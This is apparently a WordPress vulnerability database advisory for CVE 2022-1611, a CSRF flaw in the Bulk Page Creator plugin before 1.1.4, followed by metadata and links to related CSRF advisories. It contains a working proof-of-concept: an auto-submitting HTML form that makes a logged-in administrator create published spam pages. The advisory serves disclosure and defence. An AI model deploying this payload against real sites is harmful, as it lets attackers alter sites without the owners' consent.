Bulk Page Creator < 1.1.4 – Arbitrary Page Creation via CSRF | CVE 2022-1611 | Plugin Vulnerabilities

Description

The plugin does not protect its page creation functionalities with nonce checks, which makes them vulnerable to CSRF.

Proof of Concept

<form id="test" action="https://example.com/wp-admin/options-general.php?page=sc_bpc_page" method="POST">
    <textarea name="sc-pages">0|-1|123|
1|-1|bbb|
2|-1|ccc|
3|-1|spam content|
</textarea>
    <input type="text" name="pcontent" value="2">
    <input type="text" name="posttype" value="publish">
    <input type="text" name="sc-pages-content" value="some post content">
</form>
<script>
    document.getElementById("test").submit();
</script>

Affects Plugins

bulk-page-creator

Fixed in 1.1.4

References

CVE

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

Daniel Ruf

Submitter

Daniel Ruf

Submitter website

https://daniel-ruf.de

Verified

Yes

WPVDB ID

3843b867-7784-4976-b5ab-8a1e7d45618a

Timeline

Publicly Published

2022-05-09 (about 3 years ago)

Added

2022-05-09 (about 3 years ago)

Last Updated

2022-05-10 (about 3 years ago)

Other

Published

Title

Published

2023-11-23

Title

Taxonomy filter < 2.2.10 - Settings Update via CSRF

Published

2025-10-02

Title

Attractive Donations System - Easy Stripe & Paypal donations <= 1.25 - Cross-Site Request Forgery

Published

2023-09-05

Title

SendPress Newsletters <= 1.23.11.6 - CSRF

Published

2014-08-01

Title

Google Analytics MU 2.3 - google-analytics-mu-network.php Analytics Code Manipulation CSRF

Published

2023-09-29

Title

Contact Form < 2.0.12 - Form Styling Update via CSRF